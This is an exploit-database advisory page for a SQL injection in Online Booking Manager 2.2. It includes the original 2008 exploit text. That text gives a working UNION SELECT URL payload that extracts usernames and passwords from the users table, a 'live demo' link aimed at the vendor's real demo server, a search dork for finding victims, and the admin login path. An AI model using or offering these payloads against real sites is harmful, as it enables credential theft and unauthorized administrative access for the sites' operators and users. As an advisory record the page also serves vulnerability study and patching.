Online Booking Manager2.2 (id=) SQL Injection Vulnerability

vendor:

Online Booking Manager

by:

Hussin X

7.5

CVSS

HIGH

SQL Injection

CWE

Product Name: Online Booking Manager

Affected Version From: 2.2

Affected Version To: 2.2

Patch Exists: YES

Related CWE: N/A

CPE: a:onlinebookingmanager:online_booking_manager

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: Web-based

2008

Online Booking Manager2.2 (id=) SQL Injection Vulnerability

An attacker can exploit this vulnerability by sending a maliciously crafted HTTP request to the vulnerable application. The attacker can inject arbitrary SQL code into the vulnerable application, allowing them to access, modify, or delete data from the database.

Mitigation:

Input validation should be used to prevent SQL injection attacks. All user-supplied input should be validated and filtered before being used in SQL queries.

Source

Exploit-DB raw data:

#########################################################
#
#    Online Booking Manager2.2 (id=) SQL Injection Vulnerability
#
#########################################################
#
#    Author: Hussin X
#
#    Home :  www.tryag.cc/cc
# 
#    email:  darkangel_g85[at]Yahoo[DoT]com
#            hussin.x[at]hotmail[DoT]com
#
#                     IRAQI
#
##########################################################
#    HomE script : http://www.onlinebookingmanager.com
#                
#           demo : http://demo.onlinebookingmanager.com/guestside/
#     
##########################################################
#
#    DorK : Online Booking Manager2.2
#
##########################################################

Exploit:   


http://www.site.com/obmp22/checkavail.php?ln=en&id=-1+union+select+concat_ws(0x3a,UserName,UserPassword)+from+users--




L!VE DEMO:


http://demo.onlinebookingmanager.com/adminside/hotel/obm2.2/checkavail.php?ln=en&id=-1+union+select+concat_ws(0x3a,UserName,UserPassword)+from+users--




Login AdmiN :



/adminside/systemadmin/


####################################( Greetz )##################################
#                                                                              #
#      tryag / Mr.IraQ / DeViL iRaQ / IRAQ DiveR/ IRAQ_JAGUAR /str0ke          #      
#                          Silic0n/ FAHD / Iraqihack                           #      
#                                                                              #
#################################(and All IRAQIs)###############################

# milw0rm.com [2008-06-28]